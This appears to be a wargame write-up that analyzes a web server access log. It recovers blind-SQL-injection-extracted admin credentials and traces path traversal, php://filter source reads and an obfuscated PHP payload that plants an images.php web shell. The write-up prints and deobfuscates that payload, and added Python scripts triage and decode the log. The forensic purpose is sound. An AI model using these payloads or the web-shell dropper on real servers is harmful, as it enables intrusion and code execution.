Wargame - Web

weblog-1

김가윤 2023. 5. 1. 17:14

Solution

 

We need to find the admin account's password.

The given access file lets us look at the request log.

Searching it for "password" shows traces of someone comparing the admin account's password one character at a time through SQL queries.

Looking closer, a different response size, 1192, shows up among those requests. It seems the response size is 1192 only when the comparison is true.

So we find every request whose response size is 1192 and generate the password with a Python script:

# ASCII codes taken, in order, from the requests whose response size was 1192 (the "true" responses)
pw = [97, 100, 109, 105, 110, 58, 84, 104, 49, 115, 95, 49, 115, 95, 65, 100, 109, 49, 110, 95, 80, 64, 83,
      83, 44, 103, 117, 101, 115, 116, 58, 103, 117, 101, 115, 116]

# Each code is one character the attacker confirmed; join them back into the extracted string
result = "".join(chr(code) for code in pw)

print(result)  # admin:Th1s_1s_Adm1n_P@SS,guest:guest
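As an added example (not part of the original post), the script below automates the step above over an access log instead of hand-copying the numbers: it parses combined-format lines, keeps only requests whose response size equals the "true" oracle size (1192), pulls the character position and ASCII code out of each comparison, and reassembles the extracted value by position. The sample lines and the exact query shape (`substr(pw,N,1))=C`) are constructed assumptions for this example; the real file's injection form may differ, in which case only CMP_RE needs adjusting.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined format, like the post's access file).
# The blind-SQLi comparison shape is an assumption for the example; the real file
# may use a different expression. The last line has size 1192 but carries no
# comparison, to show that the size filter alone is not enough.
SAMPLE_LOG = """\
172.17.0.1 - - [02/Jun/2020:09:40:01 +0000] "GET /?q=a%27%20and%20ascii(substr(pw,1,1))%3D96%23 HTTP/1.1" 200 1180 "-" "Mozilla/5.0"
172.17.0.1 - - [02/Jun/2020:09:40:02 +0000] "GET /?q=a%27%20and%20ascii(substr(pw,1,1))%3D97%23 HTTP/1.1" 200 1192 "-" "Mozilla/5.0"
172.17.0.1 - - [02/Jun/2020:09:40:03 +0000] "GET /?q=a%27%20and%20ascii(substr(pw,2,1))%3D99%23 HTTP/1.1" 200 1180 "-" "Mozilla/5.0"
172.17.0.1 - - [02/Jun/2020:09:40:04 +0000] "GET /?q=a%27%20and%20ascii(substr(pw,2,1))%3D100%23 HTTP/1.1" 200 1192 "-" "Mozilla/5.0"
172.17.0.1 - - [02/Jun/2020:09:40:05 +0000] "GET /?q=a%27%20and%20ascii(substr(pw,3,1))%3D109%23 HTTP/1.1" 200 1192 "-" "Mozilla/5.0"
172.17.0.1 - - [02/Jun/2020:09:40:06 +0000] "GET /index.php HTTP/1.1" 200 1192 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Position / ASCII-code pair inside the decoded query (assumed shape, see lead-in).
CMP_RE = re.compile(r"substr\(\w+,(\d+),1\)\)=(\d+)")


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = unquote(rec["path"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def recover_blind_sqli(log_text, true_size):
    """Reconstruct the value an attacker read out one character at a time.

    Only lines whose response size equals `true_size` (the 'true' oracle the
    post identified as 1192) and that carry a position/ASCII comparison count;
    everything else is ignored, so ordinary pages of that size do not pollute
    the result. Positions never confirmed show up as '?'.
    """
    chars = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["size"] != true_size:
            continue
        cmp_ = CMP_RE.search(rec["path"])
        if cmp_:
            chars[int(cmp_.group(1))] = chr(int(cmp_.group(2)))
    if not chars:
        return ""
    return "".join(chars.get(i, "?") for i in range(1, max(chars) + 1))


if __name__ == "__main__":
    print(recover_blind_sqli(SAMPLE_LOG, 1192))
```

Using a dictionary keyed by position rather than appending in file order matters on real logs: retries and out-of-order requests are common, and a gap marked with "?" tells the analyst which characters were never confirmed rather than silently producing a shorter string.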

 

 

Searching the access file for config.php turned up one entry with status code 200:

172.17.0.1 - - [02/Jun/2020:09:54:18 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=../config.php HTTP/1.1" 200 986 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
php://filter/convert.base64-encode/resource=../config.php

 

 

Searching the access file for admin/?page= gives 17 entries:

172.17.0.1 - - [02/Jun/2020:09:53:05 +0000] "GET /admin/?page=users.php HTTP/1.1" 200 750 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:10 +0000] "GET /admin/?page=memo.php HTTP/1.1" 200 857 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:14 +0000] "GET /admin/?page=memo.php&memo=hi HTTP/1.1" 200 858 "http://127.0.0.1:8000/admin/?page=memo.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:18 +0000] "GET /admin/?page=memo.php HTTP/1.1" 200 858 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:22 +0000] "GET /admin/?page=users.php HTTP/1.1" 200 750 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:24 +0000] "GET /admin/?page=./users.php HTTP/1.1" 200 750 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:33 +0000] "GET /admin/?page=../../../../../etc/passwd HTTP/1.1" 200 1171 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:43 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 1554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:59 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=../index.php HTTP/1.1" 200 1384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:54:18 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=../config.php HTTP/1.1" 200 986 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:54:38 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=users.php HTTP/1.1" 200 1202 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:54:44 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=memo.php HTTP/1.1" 200 1185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:06 +0000] "GET /admin/?page=memo.php HTTP/1.1" 200 858 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:08 +0000] "GET /admin/?page=users.php HTTP/1.1" 200 750 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:10 +0000] "GET /admin/?page=memo.php HTTP/1.1" 200 858 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:16 +0000] "GET /admin/?page=memo.php&memo=%3C?php%20function%20m($l,$T=0){$K=date(%27Y-m-d%27);$_=strlen($l);$__=strlen($K);for($i=0;$i%3C$_;$i%2b%2b){for($j=0;$j%3C$__;%20$j%2b%2b){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return%20$l;}%20m(%27bmha[tqp[gkjpajpw%27)(m(%27%2brev%2bsss%2blpih%2bqthke`w%2bmiecaw*tlt%27),m(%278;tlt$lae`av,%26LPPT%2b5*5$040$Jkp$Bkqj`%26-?w}wpai,%20[CAP_%26g%26Y-?%27));%20?%3E HTTP/1.1" 200 1098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:39 +0000] "GET /admin/?page=/var/lib/php/sessions/sess_ag4l8a5tbv8bkgqe9b9ull5732 HTTP/1.1" 200 735 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

 

The most suspicious entries are the last two.
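As an added example, not part of the original post, here is a small triage script that applies the patterns visible in these 17 entries (a php:// wrapper, ../ traversal, an absolute path in page=, PHP code inside a parameter) to a handful of the lines above. The user-agent field is shortened to keep the sample compact, the memo line is a short constructed stand-in for the real one, and the rule names and functions are mine.

```python
import re
from urllib.parse import unquote

# Lines from the post's access file (user-agent shortened), plus one constructed
# line standing in for the much longer memo= request, so every rule has an input.
SAMPLE_LINES = [
    '172.17.0.1 - - [02/Jun/2020:09:53:05 +0000] "GET /admin/?page=users.php HTTP/1.1" 200 750 "http://127.0.0.1:8000/admin/" "Mozilla/5.0"',
    '172.17.0.1 - - [02/Jun/2020:09:53:24 +0000] "GET /admin/?page=./users.php HTTP/1.1" 200 750 "-" "Mozilla/5.0"',
    '172.17.0.1 - - [02/Jun/2020:09:53:33 +0000] "GET /admin/?page=../../../../../etc/passwd HTTP/1.1" 200 1171 "-" "Mozilla/5.0"',
    '172.17.0.1 - - [02/Jun/2020:09:54:18 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=../config.php HTTP/1.1" 200 986 "-" "Mozilla/5.0"',
    '172.17.0.1 - - [02/Jun/2020:09:55:39 +0000] "GET /admin/?page=/var/lib/php/sessions/sess_ag4l8a5tbv8bkgqe9b9ull5732 HTTP/1.1" 200 735 "-" "Mozilla/5.0"',
    # constructed: a memo value carrying a PHP open tag, like the real line in the post
    '172.17.0.1 - - [02/Jun/2020:09:55:16 +0000] "GET /admin/?page=memo.php&memo=%3C?php%20echo%201;%20?%3E HTTP/1.1" 200 1098 "-" "Mozilla/5.0"',
]

# Ordered rules: (label, predicate over the URL-decoded query string).
RULES = [
    ("php-wrapper", lambda q: "php://" in q.lower()),
    ("path-traversal", lambda q: "../" in q or "..\\" in q),
    ("absolute-path-include", re.compile(r"(?:^|[?&])page=/").search),
    ("code-in-parameter", lambda q: "<?php" in q.lower() or "<?=" in q),
]


def triage(line):
    """Return (timestamp, decoded query, [labels]) for one line, or None if it does not parse."""
    m = re.match(r'^\S+ \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/', line)
    if not m:
        return None
    ts, target = m.groups()
    # Decode after splitting off the path so %3F cannot smuggle in a fake '?'.
    query = unquote(target.split("?", 1)[1]) if "?" in target else ""
    labels = [label for label, hit in RULES if hit(query)]
    return ts, query, labels


def suspicious(lines):
    """Only the lines that matched at least one rule, in log order."""
    out = []
    for line in lines:
        rec = triage(line)
        if rec and rec[2]:
            out.append(rec)
    return out


if __name__ == "__main__":
    for ts, query, labels in suspicious(SAMPLE_LINES):
        print(ts, labels, query)
```

Matching on the decoded query rather than the raw line is the important detail: the real memo request in the log is almost entirely percent-encoded, so a rule looking for a literal `<?php` in the raw line would miss it.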

 

First I looked at the entry that passes PHP code through the memo parameter:

172.17.0.1 - - [02/Jun/2020:09:55:16 +0000] "GET /admin/?page=memo.php&memo=%3C?php%20function%20m($l,$T=0){$K=date(%27Y-m-d%27);$_=strlen($l);$__=strlen($K);for($i=0;$i%3C$_;$i%2b%2b){for($j=0;$j%3C$__;%20$j%2b%2b){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return%20$l;}%20m(%27bmha[tqp[gkjpajpw%27)(m(%27%2brev%2bsss%2blpih%2bqthke`w%2bmiecaw*tlt%27),m(%278;tlt$lae`av,%26LPPT%2b5*5$040$Jkp$Bkqj`%26-?w}wpai,%20[CAP_%26g%26Y-?%27));%20?%3E HTTP/1.1" 200 1098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

 

After URL-decoding the memo value and tidying up the code:

<?php
    function m($l,$T=0){
        $K=date('Y-m-d');
        $_=strlen($l);
        $__=strlen($K);
        
        for($i=0;$i<$_;$i++){
            for($j=0;$j<$__; $j++){
                if($T){
                    $l[$i]=$K[$j]^$l[$i];
                }
                else{
                    $l[$i]=$l[$i]^$K[$j];
                }
            }
        }
        
        return $l;
    } 
    
    echo m('bmha[tqp[gkjpajpw')."\n";
    echo m('+rev+sss+lpih+qthke`w+miecaw*tlt')."\n";
    echo m('8;tlt$lae`av,&LPPT+5*5$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?');
?>

 

Running the code prints garbage.

Looking at $K, the code derives its key from the date() function, so the output depends on the day the code is run. I replaced it with the date the payload was actually sent, taken from the log line's timestamp:

2020-06-02


172.17.0.1 - - [02/Jun/2020:09:55:16 +0000]
<?php
    function m($l,$T=0){
        $K="2020-06-02";
        $_=strlen($l);
        $__=strlen($K);
        
        for($i=0;$i<$_;$i++){
            for($j=0;$j<$__; $j++){
                if($T){
                    $l[$i]=$K[$j]^$l[$i];
                }
                else{
                    $l[$i]=$l[$i]^$K[$j];
                }
            }
        }
        
        return $l;
    } 
    
    echo m('bmha[tqp[gkjpajpw')."\n";
    echo m('+rev+sss+lpih+qthke`w+miecaw*tlt')."\n";
    echo m('8;tlt$lae`av,&LPPT+5*5$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?');
?>
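As an added example (not from the original post), the script below is a Python port of the attacker's m() that takes the key date from the log line's own timestamp instead of calling date(), which is exactly why the first run above printed garbage. It also shows why the obfuscation is weaker than it looks: XOR-ing a byte with each key character in turn is the same as one XOR with the XOR of all of them, so the whole routine collapses to a single-byte XOR. The log line is the one from the post; the function names are mine.

```python
import re
from datetime import datetime
from functools import reduce
from operator import xor
from urllib.parse import unquote

# The request from the post's access file that carries the obfuscated PHP in memo=.
MEMO_LOG_LINE = (
    '172.17.0.1 - - [02/Jun/2020:09:55:16 +0000] "GET /admin/?page=memo.php&memo=%3C?php%20function%20m'
    '($l,$T=0){$K=date(%27Y-m-d%27);$_=strlen($l);$__=strlen($K);for($i=0;$i%3C$_;$i%2b%2b){for($j=0;'
    '$j%3C$__;%20$j%2b%2b){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return%20$l;}%20'
    'm(%27bmha[tqp[gkjpajpw%27)(m(%27%2brev%2bsss%2blpih%2bqthke`w%2bmiecaw*tlt%27),m(%278;tlt$lae`av,'
    '%26LPPT%2b5*5$040$Jkp$Bkqj`%26-?w}wpai,%20[CAP_%26g%26Y-?%27));%20?%3E HTTP/1.1" 200 1098 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/83.0.4103.61 Safari/537.36"'
)


def key_byte(date_key):
    """XOR of all key characters: the single byte the whole routine really XORs with."""
    return reduce(xor, date_key.encode(), 0)


def m(encoded, date_key):
    """Port of the payload's m(): XOR every character with every key character in turn."""
    k = key_byte(date_key)
    return "".join(chr(ord(c) ^ k) for c in encoded)


def key_from_log_timestamp(line):
    """Rebuild date('Y-m-d') as it evaluated when the request was made, from [dd/Mon/yyyy:...]."""
    day = re.search(r"\[(\d{2}/[A-Za-z]{3}/\d{4}):", line).group(1)
    return datetime.strptime(day, "%d/%b/%Y").strftime("%Y-%m-%d")


def decode_memo_payload(line):
    """Return (key date, decoded m('...') arguments in order) for one memo= log line."""
    path = re.search(r'"GET (\S+) HTTP/', line).group(1)
    memo = unquote(path.split("memo=", 1)[1])
    key = key_from_log_timestamp(line)
    args = re.findall(r"m\('([^']*)'\)", memo)
    return key, [m(arg, key) for arg in args]


if __name__ == "__main__":
    key, parts = decode_memo_payload(MEMO_LOG_LINE)
    print("key:", key, "-> XOR byte", hex(key_byte(key)))
    for part in parts:
        print(part)
```

The three decoded arguments are the function name, the path written, and the contents of the file. The contents start with a header() call that forces a 404 status, which is worth keeping in mind when reading the rest of the log: the later request to /uploads/images.php?c=whoami is logged as 404 even though the file existed and ran, so a 404 here is not evidence that the request failed.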

 

I submitted /var/www/html/uploads/images.php, but it was not the answer.

The last payload was the answer:

172.17.0.1 - - [02/Jun/2020:09:55:39 +0000] "GET /admin/?page=/var/lib/php/sessions/sess_ag4l8a5tbv8bkgqe9b9ull5732 HTTP/1.1" 200 735 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

/var/lib/php/sessions/sess_ag4l8a5tbv8bkgqe9b9ull5732

 

From the question I learned that the path generated by the PHP code analyzed above is the answer:

/var/www/html/uploads/images.php

Searching for images.php, the first request that appears shows whoami being executed:

172.17.0.1 - - [02/Jun/2020:09:56:32 +0000] "GET /uploads/images.php?c=whoami HTTP/1.1" 404 490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

 
